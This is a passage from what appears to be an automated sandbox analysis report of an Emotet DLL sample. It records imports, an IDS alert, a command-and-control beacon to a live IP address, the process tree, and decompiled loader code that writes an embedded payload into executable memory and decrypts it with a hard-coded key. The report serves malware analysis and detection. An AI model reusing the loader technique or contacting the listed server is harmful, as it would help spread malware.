GlobalDeleteAtom, FreeLibrary, CompareStringA, lstrcmpW, GetVersionExA, GlobalFree, GlobalAlloc, FormatMessageA, LocalFree, GlobalLock, GlobalUnlock, GetModuleHandleA, GetProcAddress, GetCurrentProcessId, GetModuleFileNameA, SetLastError, LoadLibraryA, lstrlenA, ExitProcess, LockResource, GetLastError, lstrlenW, MultiByteToWideChar, SizeofResource, WideCharToMultiByte, LoadResource, FindResourceA, GetSystemTimeAsFileTime, MulDiv
USER32.dll	RegisterClipboardFormatA, PostThreadMessageA, MessageBeep, IsClipboardFormatAvailable, UnpackDDElParam, ReuseDDElParam, LoadMenuA, LoadAcceleratorsA, InsertMenuItemA, BringWindowToTop, TranslateAcceleratorA, IsZoomed, SetParent, GetSystemMenu, DeleteMenu, DestroyMenu, GetMenuItemInfoA, InflateRect, ReleaseCapture, LoadCursorA, SetCapture, SetWindowRgn, DrawIcon, IsRectEmpty, SetWindowContextHelpId, MapDialogRect, ShowOwnedPopups, SetCursor, PostQuitMessage, GetMessageA, TranslateMessage, ValidateRect, GetDesktopWindow, GetActiveWindow, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, SetRectEmpty, GetCursorPos, WindowFromPoint, KillTimer, SetTimer, InvalidateRect, SetRect, ShowWindow, IsDialogMessageA, SetDlgItemTextA, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, WinHelpA, IsChild, LockWindowUpdate, SetWindowsHookExA, CallNextHookEx, GetClassLongA, GetClassNameA, SetPropA, GetPropA, RemovePropA, SetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, SetActiveWindow, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetDlgItem, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, GetMessageTime, GetMessagePos, PeekMessageA, MapWindowPoints, ScrollWindow, TrackPopupMenu, GetKeyState, SetMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, IsWindowVisible, CreateWindowExA, GetClassInfoExA, GetClassInfoA, RegisterClassA, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetScrollInfo, EnableWindow, GetDC, SendMessageA, IsWindow, GetClientRect, SetScrollInfo, CopyRect, PtInRect, GetDlgCtrlID, DefWindowProcA, CallWindowProcA, GetMenu, SetWindowLongA, OffsetRect, IntersectRect, SystemParametersInfoA, IsIconic, GetWindowPlacement, GetWindowRect, GetSystemMetrics, GetWindow, GetDCEx, GetNextDlgGroupItem, DestroyIcon, CharUpperA, CharNextA, InvalidateRgn, CopyAcceleratorTableA, GetSysColorBrush, GetCapture, GetTabbedTextExtentA, UpdateWindow, SetWindowTextA, PostMessageA, GetMenuItemCount, AppendMenuA, CreatePopupMenu, SetWindowPos, EnableMenuItem, MessageBoxA, GetSubMenu, GetMenuItemID, CheckMenuItem, GetMenuState, ModifyMenuA, GetParent, GetFocus, LoadBitmapA, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, IsWindowEnabled, GetLastActivePopup, GetWindowLongA, GetWindowThreadProcessId, FillRect, TabbedTextOutA, DrawTextA, DrawTextExA, GrayStringA, ScreenToClient, ClientToScreen, ReleaseDC, GetWindowDC, BeginPaint, EndPaint, GetSysColor, InsertMenuA, GetMenuStringA, MoveWindow
GDI32.dll	CreateCompatibleDC, CreateSolidBrush, CreateDCA, GetBkColor, GetCharWidthA, StretchDIBits, CreateCompatibleBitmap, CreateEllipticRgn, CreatePatternBrush, LPtoDP, Ellipse, CreateFontIndirectA, GetTextExtentPoint32A, GetTextMetricsA, CreateRectRgnIndirect, SetRectRgn, CombineRgn, GetMapMode, PatBlt, GetRgnBox, GetTextColor, StartPage, EndPage, SetAbortProc, AbortDoc, EndDoc, DeleteDC, ExtSelectClipRgn, ScaleWindowExtEx, SetWindowExtEx, ScaleViewportExtEx, SetViewportExtEx, OffsetViewportOrgEx, SetViewportOrgEx, SelectObject, DPtoLP, GetStockObject, ExtTextOutA, TextOutA, RectVisible, PtVisible, StartDocA, GetPixel, BitBlt, GetWindowExtEx, GetViewportExtEx, GetObjectA, CreateRectRgn, SelectClipRgn, DeleteObject, IntersectClipRect, ExcludeClipRect, GetClipBox, SetMapMode, SetTextColor, SetBkMode, SetBkColor, RestoreDC, SaveDC, CreateBitmap, EnumFontFamiliesA, CreateFontA, GetDeviceCaps, Escape
COMDLG32.dll	GetFileTitleA
WINSPOOL.DRV	GetJobA, DocumentPropertiesA, ClosePrinter, OpenPrinterA
ADVAPI32.dll	RegDeleteValueA, RegSetValueExA, RegCreateKeyExA, RegQueryValueA, RegOpenKeyA, RegEnumKeyA, RegDeleteKeyA, RegQueryValueExA, GetFileSecurityA, SetFileSecurityA, RegSetValueA, IsTextUnicode, RegCloseKey, RegEnumValueA, RegOpenKeyExA, RegCreateKeyA
SHELL32.dll	DragFinish, SHGetFileInfoA, ExtractIconA, DragQueryFileA
SHLWAPI.dll	PathFindFileNameA, PathStripToRootA, PathIsUNCA, PathFindExtensionA, PathRemoveFileSpecW
oledlg.dll
ole32.dll	OleInitialize, CoFreeUnusedLibraries, OleUninitialize, CoInitializeEx, CoUninitialize, CreateILockBytesOnHGlobal, StgCreateDocfileOnILockBytes, StgOpenStorageOnILockBytes, CoGetClassObject, CoCreateInstance, CoRevokeClassObject, CLSIDFromProgID, CoTaskMemAlloc, CoTaskMemFree, OleIsCurrentClipboard, OleFlushClipboard, CoRegisterMessageFilter, CLSIDFromString
OLEAUT32.dll	SysAllocStringLen, SysAllocString, SafeArrayGetLBound, VariantClear, VariantInit, SafeArrayGetElement, SysFreeString, SafeArrayGetUBound, SysStringLen, SysAllocStringByteLen, VariantChangeType, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayGetDim, SafeArrayCreate, VariantCopy, SafeArrayDestroy, VariantTimeToSystemTime, SystemTimeToVariantTime, OleCreateFontIndirect

Exports

Name	Ordinal	Address
Control_RunDLL	1	0x10005d60

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
11/25/21-14:06:01.795636	TCP	2404336	ET CNC Feodo Tracker Reported CnC Server TCP group 19	49764	443	192.168.2.4	51.178.61.60

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2021 14:06:01.795635939 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:01.795686960 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:01.795778036 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:01.843096018 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:01.843120098 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:01.951493025 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:01.951602936 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.319535971 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.319598913 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:02.320023060 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:02.320115089 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.323743105 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.364892006 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:02.741691113 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:02.741770983 CET	443	49764	51.178.61.60	192.168.2.4
Nov 25, 2021 14:06:02.741856098 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.741880894 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.743253946 CET	49764	443	192.168.2.4	51.178.61.60
Nov 25, 2021 14:06:02.743280888 CET	443	49764	51.178.61.60	192.168.2.4

HTTP Request Dependency Graph

51.178.61.60

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49764	51.178.61.60	443	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Direction	Data
2021-11-25 13:06:02 UTC	OUT	GET /SYSKBGIBxTUBdowZhTVfUaAYAEzgMuUlGOoLKDNLDTiFBTiWsXq HTTP/1.1 Cookie: pFNpWfeVbHpase=BzroNbYOJlBeluUL21kf9bz/C9WCFsKtU3z4ZqWj1NAsmCYb46qGL4zo0otRiHL4wrBYdVMwTgrom4ILJC5Rh7kKbkp0hGijjV2ibTQJQT1b4cFT3IbmGojFIBff8vHMomGHxrv/I+8TgUg/iTHeNJSRv1mmk2PEFLzT2UUEQbG/kba0ePHqXmCT2M1YkajCceeut5bhg1Wlhj+CS8cGpwD+0qYOl0+dWBzKNb3WhUeTCqp2NZACjt06p/rDs9cWjNL4hcOMzf/2kxY/Q3UiJIrDSTrt96o/itjI5f00uDijyNSx7HzV5A== Host: 51.178.61.60 Connection: Keep-Alive Cache-Control: no-cache
2021-11-25 13:06:02 UTC	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 25 Nov 2021 13:06:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2021-11-25 13:06:02 UTC	IN	Data Raw: 32 34 34 0d 0a 3f e4 56 04 50 12 12 b0 c8 cd 4d f4 77 f2 ef fe f8 79 11 2d 64 11 48 70 53 c1 83 6a 5a 8b 92 ba ec b2 ac f1 af 7d ce 67 28 e9 9d e8 1b 56 41 b9 f9 3a 21 a4 4a 61 6d 7a b3 16 3d 09 7d 15 3b 09 49 c0 74 b3 b6 8b 2a 3a 88 1b e0 5d 6e 0d e5 d8 e3 7e d5 cd 06 77 75 7f 38 b8 60 0f 8b 53 7d 9c 19 10 1b 68 d9 4e ef 91 24 56 04 e4 be 7d 00 b6 7e c8 87 54 d5 03 81 5b a7 3b 8e c3 20 6e f5 42 7e 4f 6e 95 c8 57 c1 a6 b9 42 21 0e dd 84 f7 c3 61 82 71 2b b9 32 9f e6 27 0a cc 46 eb e2 cb 14 c8 eb 4e e8 f2 7e 14 d5 9d 36 eb 06 62 dd 5f 54 ec 94 3a b3 f1 1b 90 53 35 fc c6 09 1d ff d8 51 71 bf 39 36 5a 0a 92 4d d3 9b 54 eb 71 78 c3 bc 08 d4 0d dc d1 73 2b 3a c8 53 bf b8 70 4c 2a 09 af bc 16 5b 31 6d 02 55 84 f6 98 16 73 9f da cb 52 7f 54 3e a7 96 d8 a0 37 ef Data Ascii: 244?VPMwy-dHpSjZ}g(VA:!Jamz=};It:]n~wu8`S}hN$V}~T[; nB~OnWB!aq+2'FN~6b_T:S5Qq96ZMTqxs+:SpL[1mUsRT>7

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 3124 Parent PID: 5316

General

Start time:	14:05:50
Start date:	25/11/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll"
Imagebase:	0xed0000
File size:	893440 bytes
MD5 hash:	72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: cmd.exe PID: 1440 Parent PID: 3124

General

Start time:	14:05:51
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 1368 Parent PID: 3124

General

Start time:	14:05:51
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\MakbLShaqA.dll,Control_RunDLL
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.673846503.0000000005340000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.673692438.0000000005180000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.673414231.0000000004E10000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.673772227.00000000051E0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.673534046.0000000004F20000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000002.00000002.672601122.00000000011E0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 4596 Parent PID: 1440

General

Start time:	14:05:51
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",#1
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000003.00000002.671474262.0000000000EE0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6520 Parent PID: 4596

General

Start time:	14:05:52
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\MakbLShaqA.dll",Control_RunDLL
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 6596 Parent PID: 1368

General

Start time:	14:05:52
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Mcnqzbpvvtpxkg\ymhrqw.pgj",wpBD
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.675902171.00000000047D0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 404 Parent PID: 6596

General

Start time:	14:05:53
Start date:	25/11/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Mcnqzbpvvtpxkg\ymhrqw.pgj",Control_RunDLL
Imagebase:	0x1210000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1189207323.0000000004720000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1189697004.0000000004ED0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1191193523.0000000005280000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1188619609.0000000000C40000.00000040.00000010.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1192917717.00000000054B0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1190789322.0000000005130000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1190983661.0000000005190000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1191434317.00000000053A0000.00000040.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1189594475.0000000004DF0000.00000040.00000001.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6864 Parent PID: 568

General

Start time:	14:06:01
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: svchost.exe PID: 6208 Parent PID: 568

General

Start time:	14:06:16
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 2248 Parent PID: 568

General

Start time:	14:06:31
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: svchost.exe PID: 6844 Parent PID: 568

General

Start time:	14:06:42
Start date:	25/11/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff6eb840000
File size:	51288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: wuapihost.exe PID: 6520 Parent PID: 800

General

Start time:	14:06:42
Start date:	25/11/2021
Path:	C:\Windows\System32\wuapihost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\wuapihost.exe -Embedding
Imagebase:	0x7ff73e0e0000
File size:	10752 bytes
MD5 hash:	85C9C161B102A164EC09A23CACDDD09E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 1368 Parent PID: 3124 rundll32.exeCOMMON

Executed Functions

Function 10005AE0, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 162
librarymemorywindowCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E10005AE0(void* __ebx, void* __edi, void* __esi, intOrPtr _a8) {
				SIZE_T* _v8;
				void* _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				short _v26;
				short _v28;
				short _v30;
				short _v32;
				short _v34;
				short _v36;
				short _v38;
				char _v40;
				long _v44;
				short _v48;
				short _v50;
				short _v52;
				short _v54;
				short _v56;
				short _v58;
				short _v60;
				short _v62;
				short _v64;
				short _v66;
				short _v68;
				short _v70;
				char _v72;
				intOrPtr _v76;
				signed int _t48;
				struct HINSTANCE__* _t51;
				intOrPtr _t69;
				intOrPtr _t70;
				intOrPtr _t74;
				void* _t77;
				void* _t79;
				void* _t108;
				void* _t109;
				signed int _t110;

				_t109 = __esi;
				_t108 = __edi;
				_t79 = __ebx;
				_t48 =  *0x1006d940; // 0xc2bf211
				_v20 = _t48 ^ _t110;
				_v76 = _a8;
				_v8 = 0;
				_v44 = 0;
				_v12 = 0;
				_t51 = LoadLibraryA("whoami.exe"); // executed
				_v8 = _t51;
				if(_v8 == 0) {
					MessageBoxA(0, 0x10060938, 0, 0);
					ExitProcess(0xfff4518a);
				}
				 *0x100924b4 = 0;
				 *0x100924b8 = 0;
				 *0x100924bc = 0;
				 *0x100924c0 = 0;
				 *0x100924c4 = 0;
				_v44 = 0x23400;
				_v72 = 0x6b;
				_v70 = 0x65;
				_v68 = 0x72;
				_v66 = 0x6e;
				_v64 = 0x65;
				_v62 = 0x6c;
				_v60 = 0x33;
				_v58 = 0x32;
				_v56 = 0x2e;
				_v54 = 0x64;
				_v52 = 0x6c;
				_v50 = 0x6c;
				_v48 = 0;
				_v40 = 0x6e;
				_v38 = 0x74;
				_v36 = 0x64;
				_v34 = 0x6c;
				_v32 = 0x6c;
				_v30 = 0x2e;
				_v28 = 0x64;
				_v26 = 0x6c;
				_v24 = 0x6c;
				_v22 = 0;
				 *0x10095174 = E10005980( &_v72);
				 *0x10095178 = E10005980( &_v40);
				 *0x10095168 = E10004960( *0x10095174, "VirtualAlloc");
				 *0x1009516c = E10004960( *0x10095174, "VirtualAllocExNuma");
				 *0x10095170 = E10004960( *0x10095174, "WriteProcessMemory");
				_t122 =  *0x1009516c;
				if( *0x1009516c == 0) {
					_v12 =  *0x10095168(0, _v44, 0x3000, 0x40);
				} else {
					_t77 =  *0x1009516c(0xffffffff, 0, _v44, 0x3000, 0x40, 0); // executed
					_v12 = _t77;
				}
				WriteProcessMemory(0xffffffff, _v12, 0x1006f070, _v44, 0);
				_t69 =  *0x1006f06c; // 0x26b0
				_t70 = E1003F999(_t79, _v12, _t108, _t69); // executed
				_v16 = _t70;
				E10005430(_t122, _v16, "d+%7FM8MUeSH0_xH4)LqFl6D^D7wsqk4JxiPq0Vm@$?8mM&SjC<XQ9f7Lt+Kb>SRJQ9", 0x44); // executed
				E10005610(_v16, _v12, _v44);
				_t74 = E10004AE0(_v12, 0); // executed
				 *0x1009517c = _t74;
				return E1003F29E(1, _t79, _v20 ^ _t110, _v12, _t108, _t109);
			}

0x10005ae0
0x10005ae0
0x10005ae0
0x10005ae6
0x10005aed
0x10005af3
0x10005af6
0x10005afd
0x10005b04
0x10005b10
0x10005b16
0x10005b1d
0x10005b2a
0x10005b35
0x10005b35
0x10005b3d
0x10005b47
0x10005b51
0x10005b5b
0x10005b65
0x10005b6f
0x10005b7b
0x10005b84
0x10005b8d
0x10005b96
0x10005b9f
0x10005ba8
0x10005bb1
0x10005bba
0x10005bc3
0x10005bcc
0x10005bd5
0x10005bde
0x10005be4
0x10005bed
0x10005bf6
0x10005bff
0x10005c08
0x10005c11
0x10005c1a
0x10005c23
0x10005c2c
0x10005c35
0x10005c3b
0x10005c4b
0x10005c5c
0x10005c75
0x10005c8d
0x10005ca6
0x10005cab
0x10005cb2
0x10005ce3
0x10005cb4
0x10005cc5
0x10005ccb
0x10005ccb
0x10005cf7
0x10005cfd
0x10005d03
0x10005d0b
0x10005d19
0x10005d2d
0x10005d3b
0x10005d43
0x10005d5a

APIs

LoadLibraryA.KERNEL32(whoami.exe), ref: 10005B10
MessageBoxA.USER32 ref: 10005B2A
ExitProcess.KERNEL32 ref: 10005B35
VirtualAllocExNuma.KERNEL32(000000FF,00000000,00023400,00003000,00000040,00000000), ref: 10005CC5
WriteProcessMemory.KERNEL32(000000FF,00000000,1006F070,00023400,00000000), ref: 10005CF7

Strings

VirtualAlloc, xrefs: 10005C61
WriteProcessMemory, xrefs: 10005C92
whoami.exe, xrefs: 10005B0B
d+%7FM8MUeSH0_xH4)LqFl6D^D7wsqk4JxiPq0Vm@$?8mM&SjC<XQ9f7Lt+Kb>SRJQ9, xrefs: 10005D10
VirtualAllocExNuma, xrefs: 10005C7A

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$AllocExitLibraryLoadMemoryMessageNumaVirtualWrite
String ID: VirtualAlloc$VirtualAllocExNuma$WriteProcessMemory$d+%7FM8MUeSH0_xH4)LqFl6D^D7wsqk4JxiPq0Vm@$?8mM&SjC<XQ9f7Lt+Kb>SRJQ9$whoami.exe
API String ID: 2226308950-4256808938
Opcode ID: f8c396d9b2bfa67a1de3f56fe72ca593c71eca897f0d307a3a4be3f1737e6a18
Instruction ID: c2047eade55a37658326dc672ff7c86c3421997bb529f49a076d929e6f1a32cb
Opcode Fuzzy Hash: f8c396d9b2bfa67a1de3f56fe72ca593c71eca897f0d307a3a4be3f1737e6a18
Instruction Fuzzy Hash: E2616CB4A10204EBFB04DFA4DC85BAE7771FF58705F104129E209AB3A1E77B9904CB69

Uniqueness

Uniqueness Score: -1.00%

Function 048C441E, Relevance: 15.3, Strings: 12, Instructions: 329COMMON

Download Yara Rule

Strings

UKR, xrefs: 048C4710
E>&, xrefs: 048C447B
.~P, xrefs: 048C46FF
'N2, xrefs: 048C444E
}, xrefs: 048C4657
]jP, xrefs: 048C491E
|BC, xrefs: 048C4813
bK, xrefs: 048C45FD
3I, xrefs: 048C487A
Pe, xrefs: 048C4854
]jP, xrefs: 048C4AB2
}L~, xrefs: 048C4757

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: .~P$3I$E>&$Pe$UKR$]jP$]jP$bK$|BC$}L~$'N2$}
API String ID: 0-887363794
Opcode ID: 0b6177335206e1c0c021277a2dc2ef657dd785f2dc4ae4999b3aaf0d5e35327a
Instruction ID: 009408aa450ea1a72726ba80a889a0fb4cf05db1edc0118924e2cc3ac20c1771
Opcode Fuzzy Hash: 0b6177335206e1c0c021277a2dc2ef657dd785f2dc4ae4999b3aaf0d5e35327a
Instruction Fuzzy Hash: 32F11F715083809BD368DF65C88AA5BBBF1BBC4398F108E1DF1DA96260D7B09589CF47

Uniqueness

Uniqueness Score: -1.00%

Function 048CF41F, Relevance: 10.3, Strings: 8, Instructions: 333COMMON

Download Yara Rule

Strings

E3, xrefs: 048CF6F4
_, xrefs: 048CF7A0
<ix, xrefs: 048CF5D7
g,, xrefs: 048CF496
)h?;, xrefs: 048CF471
c, xrefs: 048CF72A
G8n, xrefs: 048CF49E
WL, xrefs: 048CF51F

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID:
String ID: )h?;$<ix$E3$G8n$WL$c$g,$_
API String ID: 0-720653590
Opcode ID: 06e8ea35e86283f8fc801f94a076ca36a621e3411985e31dcf877f6803663373
Instruction ID: 3afebf6603c5999dc91821d8b0d2b2aa6172936654b9aa14238685a6721c67a2
Opcode Fuzzy Hash: 06e8ea35e86283f8fc801f94a076ca36a621e3411985e31dcf877f6803663373
Instruction Fuzzy Hash: 2CF120714093819FE368CF25C48AA5BFBE5FBC4748F008A1DF29996260D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 048DECE3, Relevance: 8.9, Strings: 7, Instructions: 195COMMON

Download Yara Rule

Strings

WA|, xrefs: 048DEE28
oZ, xrefs: 048DEE51
"il, xrefs: 048DEEE0
30, xrefs: 048DEF1F
LX, xrefs: 048DEE81
, xrefs: 048DEE13
mU6, xrefs: 048DED5D

Memory Dump Source

Source File: 00000002.00000002.673161988.00000000048C1000.00000020.00000001.sdmp, Offset: 048C0000, based on PE: true

Associated: 00000002.00000002.673156716.00000000048C0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673189397.00000000048E5000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.673199452.00000000048E7000.00000002.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID: $"il$30$LX$WA|$mU6$oZ
API String ID: 823142352-1531084893
Opcode ID: d96237e08dd5cc9dd469382a20a885bac1911b162f57067d6a7d522da858606b
